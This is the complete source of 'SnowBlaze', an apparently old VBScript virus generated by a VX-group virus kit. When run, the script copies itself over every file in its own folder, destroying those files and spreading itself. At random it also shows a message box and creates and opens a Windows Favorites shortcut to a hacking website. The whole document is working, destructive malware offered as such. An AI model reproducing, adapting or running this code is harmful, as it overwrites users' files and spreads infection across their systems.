'SnowBlaze
'------------------------------------------------
'SnowBlaze.ASM
'Generated By: SnowBlaze
'On 99-99-99
'With The Simple WinScript Virus Kit
'By -KD- [Metaphase VX Team] & [NoMercyVirusTeam]
'Do NOT edit above this line!!!
'------------------------------------------------"
Dim SnowBlaze, WshShell, FSO, VX, VirusLink
On Error Resume Next
Randomize
Set FSO = CreateObject("Scripting.FileSystemObject")
Set WshShell = Wscript.CreateObject("Wscript.Shell")
SnowBlaze = Wscript.ScriptFullName
VX = Left(SnowBlaze, InStrRev(SnowBlaze, "\"))
For Each target in FSO.GetFolder(VX).Files
  FSO.CopyFile SnowBlaze, target.Name, 1
Next
If Int((2 * Rnd) + 1) = 1 Then
  MsgBox "SnowBlaze, yourt", 4096 , "SnowBlaze.ASM"
  Set VirusLink = WshShell.CreateShortcut("C:\WINDOWS\Favorites\SnowBlaze.URL")
  VirusLink.TargetPath = "http://www.astalavista.box.sk"
  VirusLink.Save
  WshShell.Run ("C:\WINDOWS\Favorites\SnowBlaze.URL")
End If
'SnowBlaze
